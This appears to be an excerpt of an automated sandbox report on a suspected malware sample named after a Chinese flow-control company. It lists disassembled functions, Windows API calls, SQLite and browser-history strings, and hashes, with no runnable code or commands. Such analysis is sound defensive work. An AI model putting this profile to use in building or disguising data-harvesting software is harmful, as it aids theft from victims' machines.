                                                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PathTemp$free
                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                    • API String ID: 924794160-1420421710
                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                    APIs
                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                    • String ID: General
                                                                                                    • API String ID: 999786162-26480598
                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 313946961-1552265934
                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                    • API String ID: 0-1953309616
                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                    • API String ID: 3510742995-272990098
                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2241099983-0
                                                                                                    • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                    • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4053608372-0
                                                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1471605966-0
                                                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                    APIs
                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                    • String ID: \StringFileInfo\
                                                                                                    • API String ID: 102104167-2245444037
                                                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                                                    • String ID: AE
                                                                                                    • API String ID: 3548547718-685266089
                                                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memicmpwcslen
                                                                                                    • String ID: @@@@$History
                                                                                                    • API String ID: 1872909662-685208920
                                                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                    • String ID: </%s>
                                                                                                    • API String ID: 3400436232-259020660
